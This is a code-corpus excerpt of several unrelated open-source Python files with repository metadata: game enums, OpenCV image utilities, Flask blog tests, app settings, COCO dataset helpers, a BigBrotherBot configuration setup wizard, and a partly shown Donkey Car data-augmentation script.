# class GameLogicState(Enum):
# READY_TO_PLAY_TURN = 50
# WAIT_FOR_HI = 51
class BuildingState(Enum):
UNDER_CONSTRUCTION = 30
ACTIVE = 31
DESTROYED = 32
class TradeState(Enum):
"""The AI can choose to accept a trade by setting the state from OPEN to ACCEPTED"""
ACCEPTED = 0
"""default state of a trade"""
OPEN = 1
"""if the AI chooses to open a new state, set it to new"""
NEW = 2
"""Currently, only supported in relation with claims"""
REFUSED = 3
class GameLogicState(Enum):
NOT_READY = 0
READY_FOR_TURN = 2
WAITING_FOR_AGENT = 3
TURN_COMPLETE = 4
class CursorState(Enum):
NORMAL = 320
COMBAT = 321
| [
"Vert*Jun1"
] | Vert*Jun1 |
98cf21e77fc8ef4b79de89b802717217d9af6177 | b2c59fca7af5367764238027cccbef24b262440f | /resize-get_coordinate.py | f0cf811c5de188ffd2ad88dd2cba63cdc72e835d | [] | no_license | oc-tobot/test2 | 7e767229bac9b5980b47fbd1aeb4dd2c37857735 | 93dc9e9fd41ae83d95561297d10493039c95e68e | refs/heads/main | 2023-01-20T19:37:27.999582 | 2020-11-30T15:18:44 | 2020-11-30T15:18:44 | 317,262,073 | 0 | 0 | null | 2020-11-30T15:18:45 | 2020-11-30T15:15:10 | null | UTF-8 | Python | false | false | 1,514 | py | import cv2
#get coordinate of the place where mouse click
def get_coor(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
# Do Whatever you want to, when the event occurs
ix,iy = x,y
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, str(ix),(x-100,y),font,1,(255,0,0),4)
cv2.putText(img, str(iy),(x-100,y+30),font,1,(255,0,0),4)
'''cut image on mouse click (like drawing a rectangle) : go to click_and_crop for the right click and crop fucntionality'''
point1 = False
point2 = False
rect = (0,0,0,0)
def cut_image(event, x, y, flags, params):
global rect, point1, point2
if event == cv2.EVENT_LBUTTONDOWN:
if point1 == True and point2 == True:
point1 = False
point2 = False
rect = (0,0,0,0)
elif point1 == False:
rect = (x,y,0,0,)
point1 = True
elif point2 == False:
rect = (rect[0],rect[1], x, y)
point2 = True
return rect
#resize an image : this is the right one
def resize(new_x,new_y,img):
global new_img
new_img = cv2.resize(img, (new_x,new_y))
return new_img
img = cv2.imread('6pack_cat.jpg')
img2 = cv2.imread('6pack_cut.jpg')
resize(240,240,img2)
cv2.imwrite('6pack_cut_resized.jpg', new_img)
while True:
cv2.imshow('1',img)
cv2.imshow('2',img2)
cv2.imshow('3', new_img)
k = cv2.waitKey(1)
if k == 27:
break
cv2.destroyAllWindows() | [
"noreply@github.com"
] | noreply@github.com |
a2895c375cdca0634a6d85a52cc1838a3c58292c | 092f2dd962c9c393904fd9886a726c611f8aa811 | /palletsprojects_tutorial/tests/test_blog.py | dc6550b7ef96d8db0bc0fc4e69758814b26112df | [] | no_license | iAnafem/flask_tutorial_projects | b5d2b4f7e2eb68ed54de3938d9006889c9fe76fb | c0f77fe4056b8f7c4ab16bb9cbc75f4fe90d4bde | refs/heads/master | 2022-12-13T07:13:56.415457 | 2019-08-28T20:14:35 | 2019-08-28T20:16:11 | 200,421,166 | 0 | 0 | null | 2022-12-08T06:00:55 | 2019-08-03T21:09:25 | Python | UTF-8 | Python | false | false | 2,609 | py | import pytest
from flaskr.db import get_db
def test_index(client, auth):
response = client.get('/')
assert b'Log In' in response.data
assert b'Register' in response.data
auth.login()
response = client.get('/')
assert b'Log Out' in response.data
assert b'test title' in response.data
assert b'by test on 2018-01-01' in response.data
assert b'test\nbody' in response.data
assert b'href="/1/update"' in response.data
@pytest.mark.parametrize('path', (
'/create',
'/1/update',
'/1/delete',
))
def test_login_required(client, path):
response = client.post(path)
assert response.headers['Location'] == 'http://localhost/auth/login'
def test_author_required(app, client, auth):
# change the post author to another user
with app.app_context():
db = get_db()
db.execute('UPDATE post SET author_id = 2 WHERE id = 1')
db.commit()
auth.login()
# current user can't modify other user's post
assert client.post('/1/update').status_code == 403
assert client.post('/1/delete').status_code == 403
# current user doesn't see edit link
assert b'href="/1/update"' not in client.get('/').data
@pytest.mark.parametrize('path', (
'/2/update',
'/2/delete',
))
def test_exists_required(client, auth, path):
auth.login()
assert client.post(path).status_code == 404
def test_create(client, auth, app):
auth.login()
assert client.get('/create').status_code == 200
client.post('create', data={'title': 'created', 'body': ''})
with app.app_context():
db = get_db()
count = db.execute('SELECT COUNT(id) FROM post').fetchone()[0]
assert count == 2
def test_update(client, auth, app):
auth.login()
assert client.get('/1/update').status_code == 200
client.post('/1/update', data={'title': 'updated', 'body': ''})
with app.app_context():
db = get_db()
post = db.execute('SELECT * FROM post WHERE id = 1').fetchone()
assert post['title'] == 'updated'
@pytest.mark.parametrize('path', (
'/create',
'/1/update',
))
def text_create_update_validate(client, auth, path):
auth.login()
response = client.post(path, data={'title': '', 'body': ''})
assert b'Title is required.' in response.data
def test_delete(client, auth, app):
auth.login()
response = client.post('/1/delete')
assert response.headers['Location'] == 'http://localhost/'
with app.app_context():
db = get_db()
post = db.execute('SELECT * FROM post WHERE id = 1').fetchone()
assert post is None
| [
"DPronkin@mostro.ru"
] | DPronkin@mostro.ru |
5378875ceaf1ee73d1bcd3ca29bc323f6119ee93 | be7f5ea7a9155fed2bbefba78aa36283b66e0f40 | /settings/settings_uat.py | 89abb957dbd3ff38d5427948271d30e380ac9285 | [] | no_license | omprakash1989/AttendanceClock | 6629f3ced980eba4fb5a3b9dde80b1d1f2c0690f | 2e94471d566ef1368b0dad63c757d31cd46d223e | refs/heads/master | 2022-12-12T16:16:47.732793 | 2019-09-13T12:05:29 | 2019-09-13T12:05:29 | 207,900,967 | 0 | 0 | null | 2022-12-07T23:53:59 | 2019-09-11T20:28:55 | Python | UTF-8 | Python | false | false | 795 | py | """
UAT settings file.
Creds and values to be retrieved from environment.
"""
import os
import enum
from api.punching_clock.helpers.misc_helper import get_bool_value
ENV = 'uat'
DEBUG = False
SQLALCHEMY_DATABASE_URI = os.environ['SQLALCHEMY_DATABASE_URI']
TESTING = False
LIMITER = int(os.environ.get('LIMITER', 0))
AWS_BUCKET = os.environ['AWS_BUCKET']
AWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = os.environ['AWS_SECRET_KEY']
SENTRY_DSN = os.environ.get('SENTRY_DSN', '')
SQLALCHEMY_TRACK_MODIFICATIONS = get_bool_value(os.environ.get('SQLALCHEMY_TRACK_MODIFICATIONS', 'False'))
TEST_BASE_URL = ''
TEST_SQLALCHEMY_DATABASE_URI = ''
REFRESH_DAYS = int(os.environ.get('REFRESH_DAYS', 40))
REDIS_HOST = os.environ['REDIS_HOST']
REDIS_PORT = int(os.environ['REDIS_PORT'])
| [
"oppradhan2011@gmail.com"
] | oppradhan2011@gmail.com |
d5c7839562ccd3a282f87ec69b453e84b3a68d46 | d669d3e44519a39db064aa94a341606649108b15 | /utils_cv/detection/references/coco_utils.py | 90d77c307dd8598bb6516e08be25f4997cd4d5fe | [
"BSD-3-Clause",
"MIT",
"Apache-2.0",
"LGPL-2.1-or-later"
] | permissive | abuendia/computervision-recipes | f1da7c9ebfd4c5a8555de646c806121be2058d49 | 870ef17447282804810ba2499af1f1e4cc17c55f | refs/heads/master | 2021-01-16T12:17:37.016759 | 2020-03-02T20:48:23 | 2020-03-02T20:48:22 | 243,116,856 | 1 | 0 | MIT | 2020-03-02T20:48:24 | 2020-02-25T22:31:14 | Jupyter Notebook | UTF-8 | Python | false | false | 8,869 | py | import copy
import os
import torch
import torch.utils.data
import torchvision
from pycocotools import mask as coco_mask
from pycocotools.coco import COCO
from . import transforms as T
class FilterAndRemapCocoCategories(object):
def __init__(self, categories, remap=True):
self.categories = categories
self.remap = remap
def __call__(self, image, target):
anno = target["annotations"]
anno = [obj for obj in anno if obj["category_id"] in self.categories]
if not self.remap:
target["annotations"] = anno
return image, target
anno = copy.deepcopy(anno)
for obj in anno:
obj["category_id"] = self.categories.index(obj["category_id"])
target["annotations"] = anno
return image, target
def convert_coco_poly_to_mask(segmentations, height, width):
masks = []
for polygons in segmentations:
rles = coco_mask.frPyObjects(polygons, height, width)
mask = coco_mask.decode(rles)
if len(mask.shape) < 3:
mask = mask[..., None]
mask = torch.as_tensor(mask, dtype=torch.uint8)
mask = mask.any(dim=2)
masks.append(mask)
if masks:
masks = torch.stack(masks, dim=0)
else:
masks = torch.zeros((0, height, width), dtype=torch.uint8)
return masks
class ConvertCocoPolysToMask(object):
def __call__(self, image, target):
w, h = image.size
image_id = target["image_id"]
image_id = torch.tensor([image_id])
anno = target["annotations"]
anno = [obj for obj in anno if obj["iscrowd"] == 0]
boxes = [obj["bbox"] for obj in anno]
# guard against no boxes via resizing
boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
boxes[:, 2:] += boxes[:, :2]
boxes[:, 0::2].clamp_(min=0, max=w)
boxes[:, 1::2].clamp_(min=0, max=h)
classes = [obj["category_id"] for obj in anno]
classes = torch.tensor(classes, dtype=torch.int64)
segmentations = [obj["segmentation"] for obj in anno]
masks = convert_coco_poly_to_mask(segmentations, h, w)
keypoints = None
if anno and "keypoints" in anno[0]:
keypoints = [obj["keypoints"] for obj in anno]
keypoints = torch.as_tensor(keypoints, dtype=torch.float32)
num_keypoints = keypoints.shape[0]
if num_keypoints:
keypoints = keypoints.view(num_keypoints, -1, 3)
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
boxes = boxes[keep]
classes = classes[keep]
masks = masks[keep]
if keypoints is not None:
keypoints = keypoints[keep]
target = {}
target["boxes"] = boxes
target["labels"] = classes
target["masks"] = masks
target["image_id"] = image_id
if keypoints is not None:
target["keypoints"] = keypoints
# for conversion to coco api
area = torch.tensor([obj["area"] for obj in anno])
iscrowd = torch.tensor([obj["iscrowd"] for obj in anno])
target["area"] = area
target["iscrowd"] = iscrowd
return image, target
def _coco_remove_images_without_annotations(dataset, cat_list=None):
def _has_only_empty_bbox(anno):
return all(any(o <= 1 for o in obj["bbox"][2:]) for obj in anno)
def _count_visible_keypoints(anno):
return sum(
sum(1 for v in ann["keypoints"][2::3] if v > 0) for ann in anno
)
min_keypoints_per_image = 10
def _has_valid_annotation(anno):
# if it's empty, there is no annotation
if len(anno) == 0:
return False
# if all boxes have close to zero area, there is no annotation
if _has_only_empty_bbox(anno):
return False
# keypoints task have a slight different critera for considering
# if an annotation is valid
if "keypoints" not in anno[0]:
return True
# for keypoint detection tasks, only consider valid images those
# containing at least min_keypoints_per_image
if _count_visible_keypoints(anno) >= min_keypoints_per_image:
return True
return False
assert isinstance(dataset, torchvision.datasets.CocoDetection)
ids = []
for ds_idx, img_id in enumerate(dataset.ids):
ann_ids = dataset.coco.getAnnIds(imgIds=img_id, iscrowd=None)
anno = dataset.coco.loadAnns(ann_ids)
if cat_list:
anno = [obj for obj in anno if obj["category_id"] in cat_list]
if _has_valid_annotation(anno):
ids.append(ds_idx)
dataset = torch.utils.data.Subset(dataset, ids)
return dataset
def convert_to_coco_api(ds):
coco_ds = COCO()
ann_id = 0
dataset = {"images": [], "categories": [], "annotations": []}
categories = set()
for img_idx in range(len(ds)):
# find better way to get target
# targets = ds.get_annotations(img_idx)
img, targets = ds[img_idx]
image_id = targets["image_id"].item()
img_dict = {}
img_dict["id"] = image_id
img_dict["height"] = img.shape[-2]
img_dict["width"] = img.shape[-1]
dataset["images"].append(img_dict)
bboxes = targets["boxes"]
bboxes[:, 2:] -= bboxes[:, :2]
bboxes = bboxes.tolist()
labels = targets["labels"].tolist()
areas = targets["area"].tolist()
iscrowd = targets["iscrowd"].tolist()
if "masks" in targets:
masks = targets["masks"]
# make masks Fortran contiguous for coco_mask
masks = masks.permute(0, 2, 1).contiguous().permute(0, 2, 1)
if "keypoints" in targets:
keypoints = targets["keypoints"]
keypoints = keypoints.reshape(keypoints.shape[0], -1).tolist()
num_objs = len(bboxes)
for i in range(num_objs):
ann = {}
ann["image_id"] = image_id
ann["bbox"] = bboxes[i]
ann["category_id"] = labels[i]
categories.add(labels[i])
ann["area"] = areas[i]
ann["iscrowd"] = iscrowd[i]
ann["id"] = ann_id
if "masks" in targets:
ann["segmentation"] = coco_mask.encode(masks[i].numpy())
if "keypoints" in targets:
ann["keypoints"] = keypoints[i]
ann["num_keypoints"] = sum(k != 0 for k in keypoints[i][2::3])
dataset["annotations"].append(ann)
ann_id += 1
dataset["categories"] = [{"id": i} for i in sorted(categories)]
coco_ds.dataset = dataset
coco_ds.createIndex()
return coco_ds
def get_coco_api_from_dataset(dataset):
for _ in range(10):
if isinstance(dataset, torchvision.datasets.CocoDetection):
break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return dataset.coco
return convert_to_coco_api(dataset)
class CocoDetection(torchvision.datasets.CocoDetection):
def __init__(self, img_folder, ann_file, transforms):
super(CocoDetection, self).__init__(img_folder, ann_file)
self._transforms = transforms
def __getitem__(self, idx):
img, target = super(CocoDetection, self).__getitem__(idx)
image_id = self.ids[idx]
target = dict(image_id=image_id, annotations=target)
if self._transforms is not None:
img, target = self._transforms(img, target)
return img, target
def get_coco(root, image_set, transforms, mode="instances"):
anno_file_template = "{}_{}2017.json"
PATHS = {
"train": (
"train2017",
os.path.join(
"annotations", anno_file_template.format(mode, "train")
),
),
"val": (
"val2017",
os.path.join(
"annotations", anno_file_template.format(mode, "val")
),
),
# "train": ("val2017", os.path.join("annotations", anno_file_template.format(mode, "val")))
}
t = [ConvertCocoPolysToMask()]
if transforms is not None:
t.append(transforms)
transforms = T.Compose(t)
img_folder, ann_file = PATHS[image_set]
img_folder = os.path.join(root, img_folder)
ann_file = os.path.join(root, ann_file)
dataset = CocoDetection(img_folder, ann_file, transforms=transforms)
if image_set == "train":
dataset = _coco_remove_images_without_annotations(dataset)
# dataset = torch.utils.data.Subset(dataset, [i for i in range(500)])
return dataset
def get_coco_kp(root, image_set, transforms):
return get_coco(root, image_set, transforms, mode="person_keypoints")
| [
"jiata@microsoft.com"
] | jiata@microsoft.com |
7078f79ce0aa416ba0757fc8e9c47eee9a3dab23 | 59662e1e55aeac1a6d88081bc839707a4731c8bc | /b3/setup.py | cc545dd4ff42b33311368f7b4e5b1d6d1cb67f97 | [] | no_license | spacepig/big-brother-bot | 7f63fc2430e285f8f1139cba60e66eca426b67c5 | 1bd4eadb634664aaa74299cb2aa710c3ea48bb1b | refs/heads/master | 2021-01-24T02:17:16.119597 | 2010-03-21T00:15:03 | 2010-03-21T00:15:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,880 | py | #!/usr/bin/env python
#
# BigBrotherBot(B3) (www.bigbrotherbot.com)
# Copyright (C) 2009 Mark "xlr8or" Weirath
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = 'xlr8or'
__version__ = '0.2.0'
import platform, urllib2, shutil, os, sys, time, zipfile
from functions import main_is_frozen
from distutils import version
from lib.elementtree.SimpleXMLWriter import XMLWriter
from urlparse import urlsplit
from cStringIO import StringIO
class Setup:
_pver = sys.version.split()[0]
_indentation = " "
_priority = 1
_config = "b3/conf/b3.xml"
_buffer = ''
_equaLength = 15
_PBSupportedParsers = ['cod','cod2','cod4','cod5']
def __init__(self, config=None):
if config:
self._config = config
if self.getB3Path() != "":
self._config = self.getB3Path() + "\\conf\\b3.xml"
print self._config
self.introduction()
self.clearscreen()
self._outputFile = self.raw_default("Location and name of the configfile", self._config)
#Creating Backup
self.backupFile(self._outputFile)
self.runSetup()
raise SystemExit('Restart B3 or reconfigure B3 using option: -s')
def runSetup(self):
global xml
xml = XMLWriter(self._outputFile)
# write appropriate header
xml.declaration()
xml.comment("This file is generated by the B3 setup Procedure. ")
xml.comment("If you want to regenerate this file and make sure the format is")
xml.comment("correct, you can invoke the setup procedure by ")
xml.comment("running B3 (b3_run.py) with the option -s. ")
# first level
configuration = xml.start("configuration")
xml.data("\n ")
# B3 settings
self.add_buffer('--B3 SETTINGS---------------------------------------------------\n')
xml.start("settings", name="b3")
self.add_set("parser", "cod", "Define your game: cod/cod2/cod4/cod5/iourt41/etpro/wop/smg")
self.add_set("database", "mysql://b3:password@localhost/b3", "Your database info: [mysql]://[db-user]:[db-password]@[db-server]/[db-name]")
self.add_set("bot_name", "b3", "Name of the bot")
self.add_set("bot_prefix", "^0(^2b3^0)^7:", "Ingame messages are prefixed with this code, you can use colorcodes")
self.add_set("time_format", "%I:%M%p %Z %m/%d/%y")
self.add_set("time_zone", "CST", "The timezone your bot is in")
self.add_set("log_level", "9", "How much detail in the logfile: 9 = verbose, 10 = debug, 21 = bot, 22 = console")
self.add_set("logfile", "b3.log", "Name of the logfile the bot will generate")
xml.data("\n ")
xml.end()
xml.data("\n ")
# server settings
self.add_buffer('\n--GAME SERVER SETTINGS------------------------------------------\n')
xml.start("settings", name="server")
self.add_set("rcon_password", "", "The RCON pass of your gameserver")
self.add_set("port", "28960", "The port the server is running on")
# determine if ftp functionality is available
if version.LooseVersion(self._pver) < version.LooseVersion('2.6.0'):
self.add_buffer('\n NOTE for game_log:\n You are running python '+self._pver+', ftp functionality\n is not available prior to python version 2.6.0\n')
else:
self.add_buffer('\n NOTE for game_log:\n You are running python '+self._pver+', the gamelog may also be\n ftp-ed in.\nDefine game_log like this:\n ftp://[ftp-user]:[ftp-password]@[ftp-server]/path/to/games_mp.log\n')
self.add_set("game_log", "games_mp.log", "The gameserver generates a logfile, put the path and name here")
self.add_set("public_ip", "127.0.0.1", "The public IP your gameserver is residing on")
self.add_set("rcon_ip", "127.0.0.1", "The IP the bot can use to send RCON commands to (127.0.0.1 when on the same box)")
# determine if PunkBuster is supported
if self._set_parser in self._PBSupportedParsers:
self.add_set("punkbuster", "on", "Is the gameserver running PunkBuster Anticheat: on/off")
else:
self.add_set("punkbuster", "off", "Is the gameserver running PunkBuster Anticheat: on/off", silent=True)
xml.data("\n ")
xml.end()
xml.data("\n ")
# messages settings
self.add_buffer('\n--MESSAGES------------------------------------------------------\n')
xml.start("settings", name="messages")
self.add_set("kicked_by", "%s^7 was kicked by %s^7 %s")
self.add_set("kicked", "%s^7 was kicked %s")
self.add_set("banned_by", "%s^7 was banned by %s^7 %s")
self.add_set("banned", "%s^7 was banned %s")
self.add_set("temp_banned_by", "%s^7 was temp banned by %s^7 for %s^7 %s")
self.add_set("temp_banned", "%s^7 was temp banned for %s^7 %s")
self.add_set("unbanned_by", "%s^7 was un-banned by %s^7 %s")
self.add_set("unbanned", "%s^7 was un-banned %s")
xml.data("\n ")
xml.end()
xml.data("\n ")
# plugins settings
self.add_buffer('\n--PLUGIN CONFIG PATH--------------------------------------------\n')
xml.start("settings", name="plugins")
self.add_set("external_dir", "@b3/extplugins")
xml.data("\n ")
xml.end()
xml.data("\n ")
# plugins
self.add_buffer('\n--INSTALLING PLUGINS--------------------------------------------\n')
xml.start("plugins")
self.add_plugin("censor", "@b3/conf/plugin_censor.xml")
self.add_plugin("spamcontrol", "@b3/conf/plugin_spamcontrol.xml")
self.add_plugin("tk", "@b3/conf/plugin_tk.xml")
self.add_plugin("stats", "@b3/conf/plugin_stats.xml")
self.add_plugin("pingwatch", "@b3/conf/plugin_pingwatch.xml")
self.add_plugin("adv", "@b3/conf/plugin_adv.xml")
self.add_plugin("status", "@b3/conf/plugin_status.xml")
self.add_plugin("welcome", "@b3/conf/plugin_welcome.xml")
if self._set_punkbuster == "on":
self.add_plugin("punkbuster", "@b3/conf/plugin_punkbuster.xml")
xml.data("\n ")
else:
xml.data("\n ")
xml.comment("The punkbuster plugin was not installed since punkbuster is not supported or disabled.")
xml.data(" ")
# ext plugins
xml.comment("The next plugins are external, 3rd party plugins and should reside in the external_dir.")
self.add_plugin("xlrstats", self._set_external_dir+"/conf/xlrstats.xml")
#self.add_plugin("registered", self._set_external_dir+"/conf/plugin_registered.xml", "Trying to download Registered", "http://www.bigbrotherbot.com/forums/downloads/?sa=downfile&id=22")
# final comments
xml.data("\n ")
xml.comment("You can add new/custom plugins to this list using the same form as above.")
xml.data(" ")
xml.comment("Just make sure you don't have any duplicate priority values!")
xml.data(" ")
xml.end()
xml.data("\n")
xml.close(configuration)
self.add_buffer('\n--FINISHED CONFIGURATION----------------------------------------\n')
def add_explanation(self, etext):
_prechar = "> "
print _prechar+etext
def add_buffer(self, addition, autowrite=True):
self._buffer += addition
if autowrite:
self.writebuffer()
def writebuffer(self):
self.clearscreen()
print self._buffer
def equaLize(self, _string):
return (self._equaLength-len(str(_string)))*" "
def add_set(self, sname, sdflt, explanation="", silent=False):
"""
A routine to add a setting with a textnode to the config
Usage: self.add_set(name, default value optional-explanation)
"""
xml.data("\n ")
if explanation != "":
self.add_explanation(explanation)
xml.comment(explanation)
xml.data(" ")
if not silent:
_value = self.raw_default(sname, sdflt)
else:
_value = sdflt
xml.element("set", _value, name=sname)
#store values into a variable for later use ie. enabling the punkbuster plugin.
exec("self._set_"+str(sname)+" = \""+str(_value)+"\"")
if not silent:
self.add_buffer(str(sname)+self.equaLize(sname)+": "+str(_value)+"\n")
def add_plugin(self, sname, sconfig, explanation=None, downlURL=None):
"""
A routine to add a plugin to the config
Usage: self.add_plugin(pluginname, default-configfile, optional-explanation)
Priority is increased automatically.
"""
_q = "Install "+sname+" plugin? (yes/no)"
_test = self.raw_default(_q, "yes")
if _test != "yes":
return None
if downlURL:
self.download(downlURL)
if explanation:
self.add_explanation(explanation)
_config = self.raw_default("config", sconfig)
xml.data("\n ")
xml.element("plugin", name=sname, priority=str(self._priority), config=_config)
self.add_buffer("plugin: "+str(sname)+", priority: "+str(self._priority)+", config: "+str(_config)+"\n")
self._priority += 1
def raw_default(self, prompt, dflt=None):
if dflt:
prompt = "%s [%s]" % (prompt, dflt)
else:
prompt = "%s" % (prompt)
res = raw_input(prompt+self.equaLize(prompt)+": ")
if not res and dflt:
res = dflt
if res == "":
print "ERROR: No value was entered! Give it another try!"
res = self.raw_default(prompt, dflt)
self.testExit(res)
return res
def clearscreen(self):
if platform.system() in ('Windows', 'Microsoft'):
os.system('cls')
else:
os.system('clear')
def backupFile(self, _file):
print "\n--BACKUP/CREATE CONFIGFILE--------------------------------------\n"
print " Trying to backup the original "+_file+"..."
if not os.path.exists(_file):
print "\n No backup needed.\n A file with this location/name does not yet exist,\n I'm about to generate a new config file!\n"
self.testExit()
else:
try:
_stamp = time.strftime("-%d_%b_%Y_%H.%M.%S", time.gmtime())
_fname = _file+_stamp+".xml"
shutil.copy(_file, _fname)
print " Backup success, "+_file+" copied to : %s" % _fname
print " If you need to abort setup, you can restore by renaming the backup file."
self.testExit()
except OSError, why:
print "\n Error : %s\n" % str(why)
self.testExit()
def introduction(self):
try:
_uname = platform.uname()[1]+", "
except:
_uname = "admin, "
self.clearscreen()
print " WELCOME "+_uname+"TO THE B3 SETUP PROCEDURE"
print "----------------------------------------------------------------"
print "We're about to generate a main configuration file for "
print "BigBrotherBot. This procedure is initiated when:\n"
print " 1. you run B3 with the option --setup or -s"
print " 2. the config you're trying to run does not exist"
print " ("+self._config+")"
print " 3. you did not modify the distributed b3.xml prior to"
print " starting B3."
self.testExit()
print "We will prompt you for each setting. We'll also provide default"
print "values inside [] if applicable. When you want to accept a"
print "default value you will only need to press Enter."
print ""
print "If you make an error at any stage, you can abort the setup"
print "procedure by typing \'abort\' at the prompt. You can start"
print "over by running B3 with the setup option: python b3_run.py -s"
self.testExit()
print "First you will be prompted for a location and name for this"
print "configuration file. This is for multiple server setups, or"
print "if you want to run B3 from a different setup file for your own."
print "reasons. In a basic single instance install you will not have to"
print "change this location and/or name. If a configuration file exists"
print "we will make a backup first and tag it with date and time, so"
print "you can always revert to a previous version of the config file."
print ""
print "This procedure is new, bugs may be reported on our forums at"
print "www.bigbrotherbot.com"
self.testExit(_question='[Enter] to continue to generate the configfile...')
def testExit(self, _key='', _question='[Enter] to continue, \'abort\' to abort Setup: ', _exitmessage='Setup aborted, run python b3_run.py -s to restart the procedure.'):
if _key == '':
_key = raw_input('\n'+_question)
if _key != 'abort':
print "\n"
return
else:
raise SystemExit(_exitmessage)
def getB3Path(self):
if main_is_frozen():
# which happens when running from the py2exe build
return os.path.dirname(sys.executable)
return ""
def getAbsolutePath(self, path):
"""Return an absolute path name and expand the user prefix (~)"""
if path[0:4] == '@b3/':
path = os.path.join(self.getB3Path(), path[4:])
return os.path.normpath(os.path.expanduser(path))
def url2name(self, url):
return os.path.basename(urlsplit(url)[2])
def download(self, url, localFileName = None):
absPath = self.getAbsolutePath(self._set_external_dir)
localName = self.url2name(url)
req = urllib2.Request(url)
r = urllib2.urlopen(req)
if r.info().has_key('Content-Disposition'):
# If the response has Content-Disposition, we take file name from it
localName = r.info()['Content-Disposition'].split('filename=')[1]
if localName[0] == '"' or localName[0] == "'":
localName = localName[1:-1]
elif r.url != url:
# if we were redirected, the real file name we take from the final URL
localName = url2name(r.url)
if localFileName:
# we can force to save the file as specified name
localName = localFileName
localName = absPath+"/packages/"+localName
f = open(localName, 'wb')
f.write(r.read())
f.close()
self.extract(localName, absPath)
def extract(self, filename, dir):
zf = zipfile.ZipFile( filename )
namelist = zf.namelist()
dirlist = filter( lambda x: x.endswith( '/' ), namelist )
filelist = filter( lambda x: not x.endswith( '/' ), namelist )
# make base
pushd = os.getcwd()
if not os.path.isdir( dir ):
os.mkdir( dir )
os.chdir( dir )
# create directory structure
dirlist.sort()
for dirs in dirlist:
dirs = dirs.split( '/' )
prefix = ''
for dir in dirs:
dirname = os.path.join( prefix, dir )
if dir and not os.path.isdir( dirname ):
os.mkdir( dirname )
prefix = dirname
# extract files
for fn in filelist:
try:
out = open( fn, 'wb' )
buffer = StringIO( zf.read( fn ))
buflen = 2 ** 20
datum = buffer.read( buflen )
while datum:
out.write( datum )
datum = buffer.read( buflen )
out.close()
finally:
print fn
os.chdir( pushd )
if __name__ == '__main__':
#from b3.fake import fakeConsole
#from b3.fake import joe
#from b3.fake import simon
Setup('test.xml')
| [
"xlr8or@xlr8or.com"
] | xlr8or@xlr8or.com |
9ce1793c5864c4d76e8ce99b894826a84f834417 | 14736881216888f4233dfe8a355a8aefe518cdbf | /old_files/augmentv1.2.py | 06121106490b2987cf952714c8f17dcdaceb026c | [
"MIT"
] | permissive | JuanFuriaz/donkey_share | 8c9fa59a2c7f8c0610aa2e13a4eb853244808001 | caad831ca21094f05f9084f881ca3bbfa4168e4c | refs/heads/master | 2020-12-26T05:45:36.400501 | 2020-08-09T17:38:07 | 2020-08-09T17:38:07 | 237,402,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,119 | py | """
Script to augment teaching data
version 1.2
Usage:
augment.py --path=<records_dir> --out=<target_dir> [--method=all|classic|gaussian|threshold|canny|style_aug] --gpu_enabled=1
Options:
-h --help Show this screen.
--path TUBPATHS Path of the record directory
--out MODELPATH Path of the model file
Todo:
- add parser
- change function's input to args
- dont copy origin images
- create folder with tub name: example: tub_10-22-12_candy
- FUTURE have both options of creating folder OR giving array
- multiple folder arrays with subcomand, example of options
-all: do everything
-trad: traditional augmentation
-candy: cady transd
...
"""
from docopt import docopt
from PIL import Image
import numpy as np
import cv2
import glob
import json
import re
import copy
import shutil
import os
from collections import deque
from os import sys
# user defined imports
import styleaug.cv
from styleaug.cv import ImgGaussianBlur
from styleaug.cv import ImgThreshold
from styleaug.cv import ImgCanny
from styleaug.cv_stylaug import ImgStyleAug
def ensure_directory(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def print_progress(count, total, name='', bar_length=20):
if count % 10 == 0 or count == total:
percent = 100 * (count / total)
filled_length = int(bar_length * count / total)
bar = '=' * filled_length + '-' * (bar_length - filled_length)
print('\r %s\t |%s| %.1f%% %s' % (name, bar, percent, 'done'), end='\r')
if count == total:
print()
def initialize_records(records, path, out, target_dir):
sum = 0
if path is not out:
target_path = '%s/%s' % (out, target_dir)
ensure_directory(target_path)
shutil.copy('%s/meta.json' % path, target_path)
else:
target_path = path
for _, record in records:
sum = sum + 1
if path is not out:
with open(record, 'r') as record_file:
data = json.load(record_file)
img_path = data['cam/image_array']
shutil.copy(record, target_path)
shutil.copy('%s/%s' % (path, img_path), target_path)
return (sum, target_path)
# TODO: better place for global stuff
round_number = 0
def augmentation_round(in_path, out, total, name, augment_function, meta_function=None):
global round_number
round_number += 1
target = '%s/%s_%s' % (out, round_number, name)
records = glob.glob('%s/record*.json' % in_path)
records = ((int(re.search('.+_(\d+).json', path).group(1)), path) for path in records)
ensure_directory(target)
if (meta_function is not None):
with open('%s/meta.json' % in_path, 'r') as meta_file:
raw_data = json.load(meta_file)
new_data = meta_function(raw_data)
with open('%s/meta.json' % target, 'w') as outfile:
json.dump(new_data, outfile)
else:
shutil.copy('%s/meta.json' % in_path, target)
count = 0
for _, record in sorted(records):
with open(record, 'r') as record_file:
data = json.load(record_file)
img_path = data['cam/image_array']
img = Image.open('%s/%s' % (in_path, img_path))
img = np.array(img)
write(target, _, img, data, name, augment_function)
count = count + 1
print_progress(count, total, name)
return (count, target)
def write(out, id, img, data, name, augment_function):
new_img, new_data = augment_function(img, data)
# Augment function can return None if this item should be skipped in the return set
if (new_img is None or new_data is None):
return
record_path = '%s/record_%d.json' % (out, id)
image_name = '%d_%s.jpg' % (id, name)
image_path = '%s/%s' % (out, image_name)
new_data['cam/image_array'] = image_name
